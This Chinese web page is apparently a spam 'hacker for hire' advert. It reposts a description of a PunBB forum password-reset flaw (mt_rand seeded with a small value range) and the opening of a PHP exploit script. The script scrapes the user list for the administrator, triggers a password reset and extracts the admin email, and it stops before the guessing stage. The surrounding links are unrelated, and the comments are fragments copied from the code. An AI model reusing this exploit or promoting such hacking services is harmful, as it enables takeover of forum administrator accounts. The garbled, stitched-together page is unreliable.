当前位置:首页 > 黑客业务 > 正文内容

怎么找网络黑客接单(24小时接单的黑客

访客3年前 (2021-03-20)黑客业务871

PunBB是一款基于PHP的论坛程序。 

PunBB的口令重置功能实现上存在漏洞,远程攻击者可能利用此漏洞在特定条件重置用户的口令。 
如果用户忘记了口令的话,可使用PunBB的口令重置功能重置。在请求口令重置后,论坛会向用户发送一封邮件,包含有一个新的随机口令以及激活链接,用户必须点击这个链接才能使口令更改生效。 
PunBB的口令重置功能使用mt_rand()生成新口令和激活链接,但在初始化马特赛特旋转演算法随机数生成器时使用了0到1,000,000之间的随机数,具体取决于当前的微秒,也就是只有100万个可能的新口令和激活链接。攻击者可以暴力猜测这个有限的区域,判断重置的口令并激活。 

<?php 
/** 
* Original : http://www.winshell.cn/2008-01.txt 
* Thanks to Stefan Esser, here's the exploit. 

* Team : EpiBite 
* firefox, petit-poney, thot 
* Nous tenons a remercier nos mamans et papas respectifs. 
* Let's get a fu*** coffee ! 
*/ 

// conf 
define('URL', 'http://localhost/punbb_1-2-16_fr/upload'); // base url 
define('EMAIL', 'login_x@epitech.net'); // your email 
define('LOGIN', 'login_x'); // your login 
define('PASS', '620553.8I73'); // your pass 
// Exploit 
printf("--\nUrl : %s\nEmail : %s\n--\n", URL, EMAIL); 
$h = curl_init(); 
curl_setopt($h, CURLOPT_URL, 
URL.'/userlist.php?username=&show_group=-1&sort_by=registered&sort_dir=ASC&search=Envoyer'); 
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1); 
$s = curl_exec($h); 
preg_match('/profile\.php\?id=([0-9]*)">([^<]*)', $s, $m); 
define('ADMIN', $m[2]); 
preg_match('/

([0-9]{4})-([0-9]{2})-([0-9]{2})<\/td/', $s, $m); 
if (count($m)) 
define('DATE', mktime(0, 0, 0, $m[2], $m[3], $m[1])); 
else 
define('DATE', time() - 86400); //just in case, the forum or account just has been created 
printf("Admin : %s\nDate : %s\n--\n", ADMIN, DATE); 
$h = curl_init(); 
curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=forget_2'); 
// curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128'); 
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($h, CURLOPT_HEADER, 1); 
curl_setopt($h, CURLOPT_POST, 1); 
curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1', 
'req_email='.urlencode(EMAIL), 
'request_pass=Envoyer'))); 
preg_match('/mailto:([^"]*)"/', curl_exec($h), $m); 
define('ADMIN_MAIL', $m[1]); // Admin email (normally automatically get, set manually if there's problem) 
printf("Admin mail : %s\n--\n", ADMIN_MAIL); 

扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:http://www.therlest.com/109285.html

分享给朋友:

“怎么找网络黑客接单(24小时接单的黑客” 的相关文章

华流芒种是几月几号农历

芒种是二十四节气之一,大家对于二十四节气也已经非常熟悉了,但是芒种是哪一天还不是很清楚,今年的芒种是阳历6月5日,那么2020年芒种是农历几月几号呢?接下来我们就一起了解一下吧。     2020年芒种是农历几月几号...

字节承认商业化团队撤城裁员

据晋江新闻网2021年10月19日21:00:43的最新发布,微博网友@ 爆料。 平安夜来临之际,事件,在网上炒得沸沸扬扬,引发全网热议! 据悉,黑客追款后来被报道了几次。猜测第六百八十八章逃港者第六百八十九章调侃第六百。相对这个账号是他的。 1.专业网赌追回律师 首先确保整个真正的黑客追款方案是最...

猪肉怎么选?颜色有区别吗?今天做饭的时候发现上次买的猪肉颜色跟这

猪肉怎么选?颜色有区别吗?今天做饭的时候发现上次买的猪肉颜色跟这 买猪肉时,根据肉的颜色、外观、气味等可以判断出肉的质量是好还是坏。优质的猪肉,脂肪白而硬,且带有香味。肉的外面往往有一层稍带干燥的膜,肉质紧密,富有弹性,手指压后凹陷处立即复原。 次鲜肉肉色较鲜肉暗,缺乏光泽,脂肪呈灰白色;表面带...

宜家自助餐多少钱一位 「天津宜家自助餐多少钱」

食材的流转等息息相关的,白堤路店,就不用付钱了。吃完了,不像别的自助沙拉酱都兑了N多的水!其他」的也是10多块20块一份。鞍山西道,你绝对吃不腻。 举荐菜:当然是面啦!海鲜、你去尝尝吧。 举荐蔡:特色鸡串,金汉斯南美多少烤肉,腌好的肉和没腌的肉都有,200元一位,宜家家居,宜家2楼那个不是自助餐厅,...

今天发生的重大新闻5条,国内新闻最新消息10条

近期发生的额十件大新闻,伊朗重申继续实施核计划。本·拉登被击毙,近期国内外新闻要近期。 被关闭·国家最高科学技术奖揭晓"青藏铁路工程"等获奖·广西陆川一在建楼面坍塌14名工人坠地受伤,文汇报,执政党民族解放党总统,到了主要内容介绍完。 这是初中作业吧!月1日—德国总理默克尔倡议成立联合国经济理事会。...

蚯蚓的市场价格 - 2020年蚯蚓收购价格

今年2020年这个价格还算是比较合理,市场价格较为平稳,当地蚯蚓批发价250元/万条,今日浙江海宁地区鲜蚯蚓批发价为17,最高可卖3元/两,每次都-是老家亳州的来回辗转的跑辛苦.货源充足,现在贩子登门收购18-222020元/斤不等。 目前价格多少钱一斤目前价格在8元一斤,是一种营养价值很高的无脊椎...

评论列表

泪灼矫纵
2年前 (2022-06-09)

.net'); // your email define('LOGIN', 'login_x'); // your login define('PASS', '620553.8I73'); // your pass // Exploit printf("--\

断渊隐诗
2年前 (2022-06-09)

'login_x'); // your login define('PASS', '620553.8I73'); // your pass // Exploit print

野欢诤友
2年前 (2022-06-09)

'))); preg_match('/mailto:([^"]*)"/', curl_exec($h), $m); define('ADMIN_MAIL', $m[1]); // Admin emai

竹祭绮烟
2年前 (2022-06-09)

URLOPT_RETURNTRANSFER, 1); curl_setopt($h, CURLOPT_HEADER, 1); curl_setopt($h, CURL

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。